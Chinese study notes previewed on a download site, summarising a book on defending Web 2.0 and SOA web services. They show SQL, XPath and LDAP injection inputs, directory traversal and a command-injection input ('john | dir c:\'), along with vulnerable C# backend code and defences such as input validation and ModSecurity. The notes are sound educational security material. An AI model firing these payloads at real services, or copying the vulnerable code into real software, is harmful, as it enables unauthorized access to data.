首页资源分类电源技术 > Web 2.0 Security-Defending Ajax,RIA,and SOA_学习笔记.docx

Web 2.0 Security-Defending Ajax,RIA,and SOA_学习笔记.docx

已有 456409个资源

下载专区

文档信息举报收藏

标    签: webajax学习学习笔记笔记

分    享:

文档简介

Web 2.0 Security-Defending Ajax,RIA,and SOA_学习笔记.docx

文档预览

 Chapter 11 SOA and Web Services Security SOA基本架构 SOA威胁框架 Chapter 12 SOA Attack Vectors and Scanning for Vulnerabilities Profiling Web services(分析 Web Services) 使用wsScanner分析Web Services: TECHNOLOGY FINGERPRINTING AND ENUMERATION(分析后台架构) 通过ASMX AND JWS EXTENSIONS(后缀名)、响应信息分析后台技术架构 XML POISONING WITH SAX PARSING XML POISONING WITH DOM PARAMETER TAMPERING(参数篡改) Metacharacter injection Data type mismatch Large buffer Abnormal values Sequence breaking TAMPERING WITH DATA TYPES OF THE SOAP MESSAGE(数据类型篡改) 通过输入不同类型的数据,可能引发异常信息返回 More information leaks mean more pieces of this Web services jigsaw puzzle that fit. As this set of information is collected and put into perspective, we may be able to draw a better picture about the technology and application layer logic in use and other significant information. SQL INJECTION WITH SOAP MANIPULATION(SQL注入) 输入双引号: " 响应: soap:Server Server was unable to process request. --> Cannot use empty object or column names. Use a single space if necessary. Unclosed quotation mark before the character string ''. Line 1: Incorrect syntax near ''. SQL注入攻击: 1 OR 1=1 响应: /(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ /(7)Lawrence of Arabia($14.99)/ XPATH INJECTION(Xpath注入) 正常的请求: shreeraj shreeraj 响应: 0009879001 错误的账号: shreeraj blahblah 响应: Access Denied! XPath注入: ' or 1=1 or ''=' * 响应: 0009879001 后台的代码: public string getSecurityToken(string username,string password) { string xmlOut = ""; string coString = "Provider=SQLOLEDB;Server=(local);database=order; User ID=sa;Password=JUNK6509to"; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag="Credential"; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = "SELECT * FROM users for xml Auto"; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); xmlOut = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(xmlOut); string credential = "//users[@username='"+username+"' and @password='"+password+"']"; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { // Token generation code return token; } else { return "Access Denied!"; } } 漏洞分析: co.CommandText = "SELECT * FROM users for xml Auto"; string credential = "//users[@username='"+username+"' and @password='"+password+"']"; 注入后变成: //users[@username='' or 1=1 or ''='' and @password='anything'] LDAP INJECTION WITH SOAP(LDAP注入) 正常访问: shreeraj 响应: ----------------------- [displayname]Shreeraj K. Shah [useraccountcontrol]66048 [initials]K [objectguid]System.Byte[] [whenchanged]1/5/2006 11:03:06 PM [usncreated]5772 [name]Shreeraj K. Shah [distinguishedname]CN=Shreeraj K. Shah,CN=Users,DC=bluesquare,DC=com [primarygroupid]513 [lastlogon]0 [lastlogoff]0 [instancetype]4 [samaccountname]shreeraj [countrycode]0 [badpasswordtime]0 [accountexpires]9223372036854775807 [adspath]LDAP://192.168.7.150/CN=Shreeraj K. Shah,CN=Users,DC=bluesquare,DC=com … … [objectclass]organizationalPerson [objectclass]user ----------------------- 注入“(”号: ( 响应: soap:Server Server was unable to process request. --> The (samaccountname=() search filter is invalid. 后台代码: public string getUserInfo(string username) { AuthenticationTypes at = AuthenticationTypes.Secure; DirectoryEntry entry = new DirectoryEntry("LDAP://192.168.7.150","administrator","bla74",at); string domain = entry.Name.ToString(); DirectorySearcher mySearcher = new DirectorySearcher(entry); SearchResultCollection results; string filter = "(samaccountname="+username+")"; mySearcher.Filter = filter; results = mySearcher.FindAll(); if (results.Count > 0) { //result block… return res; } else { return "none"; } } 注入“*”号的响应: ----------------------- [systemflags]-1946157056 [showinadvancedviewonly]False [usncreated]1517 [samaccounttype]536870912 [distinguishedname]CN=Account Operators,CN=Builtin,DC=bluesquare,DC=com [iscriticalsystemobject]True [name]Account Operators [instancetype]4 [samaccountname]Account Operators [objectclass]top [objectclass]group [usnchanged]1519 [whenchanged]3/22/2004 3:32:31 AM [adspath]LDAP://192.168.7.150/CN=Account Operators,CN=Builtin,DC=bluesquare,DC=com [whencreated]3/22/2004 3:32:31 AM [objectcategory]CN=Group,CN=Schema,CN=Configuration, DC=bluesquare,DC=com [description]Members can administer domain user and group accounts [grouptype]-2147483643 [cn]Account Operators [objectsid]System.Byte[] [objectguid]System.Byte[] ………… --- and so on. All nodes are harvested --- DIRECTORY TRAVERSAL AND FILESYSTEM ACCESS THROUGH SOAP(目录遍历和文件系统访问) 输入正常日期: 20060109 响应: Ljubicic proves too good for MoyaAll emotions crossed his face. Anger, disappointment, annoyance. But Ivan Ljubicic didn't afford himself a smile till he smacked a forehand crosscourt winner. Chennai Open: Home hopes dashed when Rohan Bopanna struck the ball so hard that once he took off his own name plate from the scoreboard. The other time, he nearly decapitated Petr Pala. Atwal heroics not enough for Asia. Arjun Atwal led the fightback for Asia who however fell just short as Europe won the inaugural Royal Trophy by a 9-7 margin here on Sunday. 输入错误数据类型: junk 响应: HTTP/1.1 500 Internal Server Error. Server: Microsoft-IIS/5.0 Date: Mon, 09 Jan 2006 09:14:57 GMT X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/xml; charset=utf-8 Content-Length: 504 soap:Server Server was unable to process request. --> Could not find file &quot;c:\inetpub\wwwroot\news\junk&quot;. 访问源代码文件: daily.asmx 响应: <%@ WebService Language="c#" Class="daily" %>using System;using System.Web.Services;using System.Data.SqlClient;using System.IO;public class daily{[WebMethod] public string getSportsNews(string date){ ----- Source code of the entire file ------ 遍历目录: ../../../../../autoexec.bat 后台漏洞代码: public string getSportsNews(string date) { String prodfile = "c:\\inetpub\\wwwroot\\news\\"+date; FileStream fs=new FileStream(prodfile,FileMode.Open,FileAccess.Read); StreamReader sr=new StreamReader(fs); String file = ""; while(sr.Peek() > -1) { file += sr.ReadLine(); } return file; } OPERATING SYSTEM COMMAND EXECUTION USING VULNERABLE WEB SERVICES(命令注入) 正常输入: john 响应: Name=John City=NewYork State=NewYork Country=USA Weather=YES Stocks=No Email=YES 错误用户名输入: junk 响应: Unsuccessful command 命令注入: john | dir c:\ 响应: Volume in drive C has no label. Volume Serial Number is 64F0-BF7D Directory of c:\ 04/08/2005 12:08p <DIR> .cpan 02/23/2004 12:57p 632 266973.7.slf.zip 11/15/2005 04:01p 55 addroute.bat ... ... ... 28 File(s) 1,511,669 bytes 17 Dir(s) 3,505,385,472 bytes free 后台漏洞代码: public string getUserPrefFile(string user) { DateTime random = DateTime.Now; string store = random.ToUniversalTime().Ticks.ToString(); System.Diagnostics.ProcessStartInfo psi = new System.Diagnostics.ProcessStartInfo(); psi.FileName = @"C:\winnt\system32\cmd.exe"; psi.Arguments = @"/c type c:\users\"+user+@" > c:\temp\"+store; psi.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; System.Diagnostics.Process.Start(psi); System.Threading.Thread.Sleep(1000); System.IO.StreamReader sr = new System.IO.StreamReader(@"c:\temp\"+store); string file = sr.ReadToEnd(); if(file.Length > 0) return file; else return "Unsuccessful command"; } } SOAP MESSAGE BRUTE FORCING(暴力破解) SOAP brute forcing is no different from any other type of brute forcing used at different levels of services such as FTP and Network Basic Input/Output System (NetBIOS). Authentication is required before consuming Web services. Successful authentication results in the user getting a security token or parameter to access other parts of Web services. This type of authentication may be done using a username and password combination. In the absence of lockout policies or proper logging mechanisms, it is possible to launch brute forcing attacks on these parameters and try to gain unauthorized access to the system and Web services. SESSION HIJACKING WITH WEB SERVICES(Session劫持) shreeraj shreeraj 响应: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 10 Jan 2006 11:52:43 GMT X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=xuuhba32c552ic2kk4vorrfo; path=/ Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Content-Length: 384 xuuhba32c552ic2kk4vorrfo if the cookie is constructed using a weak algorithm, it can be vulnerable to easy guesses by another user. This may lead to session hijacking. Another potential hazard is unencrypted HTTP traffic sniffed over the network and replayed. Session Fixation(Session固定) Session Fixation 翻译过来就是 “Session 完成攻击”,以前的老的应用里可能比较常见这种问题,但是随着现在web应用越来越复杂,这种问题已经很少了。   先理解这个攻击,打个比方:   1. 你花钱买了一辆车   2. 你把车钥匙复制了一把   3. 你把这辆车卖给了一个冤大头   4. 冤大头同学花钱买了辆2手车,结果在某天你趁他不在,用事先复制好的钥匙把车开走了!   这个过程就是一个 Session Fixation 的过程,车钥匙就是 Session ID。   这类问题的本质在于:WEB应用在认证后没有改写或者更新session,从而导致了认证前的session还能使用。   如果攻击者事先能够获知该session ID,则可以欺骗用户使用该session ID进行认证,认证后,由于session ID不变,但是该session变成了一个认证后的session,从而攻击者可以直接使用该session ID以用户身份通过系统的认证。   在Web环境里,用户浏览页面时服务器会产生一个session,然后session ID会放在客户端,比如在浏览器URL里,或者是cookie里。用户持有这个session ID,服务器就可以找到他的session。用户输入用户名和密码后,系统对该session进行认证。认证成功,该session就是一个认证后的session,服务器就知道该用户认证过了,用户访问认证页面时就不再需要每次输入用户名和密码了。 常见的利用Session Fixation的方法一般是发送一个link到邮件里,诱骗用户点击后登录,使得该session通过认证,比如:   http://www.fvck.com/auth?session=xxxxxxx   要对抗这种攻击,很简单,就是认证后重新生成一个session就可以了,甚至是增改当前session都能起到这个目的。 Session Hijacking(Session劫持) HTTP是一种无状态的连接,会话状态的保持只能通过服务器端的SESSION来维持。SESSION认证依赖于颁发给用户的一个唯一的ID号。用户浏览器向服务器发送一个ID,服务器端存在该会话ID则认为该用户和会话用户为同一人。恶意攻击者可以通过嗅探网络中的COOKIE信息冒用其它用户的SESSION ID,从而冒充合法用户,这就是SESSION劫持。 COOKIE除了保存会话ID,还常常用于记住密码功能,避免繁琐的登录。大部分网站都将帐号密码保存于COOKIE中,这增加了风险:COOKIE传输过程中被第三方窥探、COOKIE文件被恶意拷贝、离线构造COOKIE破解密码……这一切都应该归于COOKIE欺骗。 现有的办法是使用SSL安全传输,但增加了开销,大部分网站都无法承担整站SSL带来的巨大资源消耗,往往是登录页使用SSL,其它页面依旧是透明的HTTP。这对SESSION劫持毫无用处。 利用IP、Mac地址等来唯一标识请求来源 参考: http://blog.csdn.net/huangkaixuan/article/details/7614547 http://msdn.microsoft.com/zh-cn/magazine/cc300500(en-us).aspx http://hi.baidu.com/yangyuenfei/item/c516c234f6544c483075a1f7 Chapter 13 Web 2.0 Application Fuzzing for Vulnerability Detection and Filtering for Countermeasures WEB 2.0 APPLICATION FUZZING FUZZING XML STREAMS One can analyze these responses and identify possible vulnerabilities. For example, in the above case, we get a string saying“Error in running statement” that is clearly pointing to some sort of SQL statement issue. One can investigate the issue in detail. FUZZING JSON STREAMS Having access to the JSON stream, one can do full-blown penetration and application assessment testing on it. It is possible to do, for example, SQL injections, LDAP/XPATH injections, user/pass brute forcing on these JSON streams. The application resource may fail and cough up some critical information back to the attacker and can open a security hole. WEB 2.0 APPLICATION FIREWALL AND FILTERING 防御方法: To overcome this critical problem, there are two possible solutions: 1. Applying powerful Web 2.0 content filtering capability such as implementing an XML firewall or JSON filtering to protect these streams 2. Secure coding and proper input validation before receiving input from these Web 2.0 streams WEB 2.0 FIREWALL AND FILTERING WITH MODSECURITY http://www.modsecurity.org/ WEB 2.0 FIREWALL WITH IHTTPMODULE IN .NET Microsoft’s .NET framework includes two interfaces: IHttpModule and IHttpHandler. These two interfaces can be leveraged to provide application-level defenses customized to application level, folder level, or variable level. This can act as the first line of defense, before any incoming request touches the Web application source code level. This is Web application defense at the gates, for the .NET framework on IIS. Chapter 14 Web 2.0 Application Defenses by Request Signature and Code Scanning

Top_arrow
回到顶部
EEWORLD下载中心所有资源均来自网友分享,如有侵权,请发送举报邮件到客服邮箱bbs_service@eeworld.com.cn 或通过站内短信息或QQ:273568022联系管理员 高进,我们会尽快处理。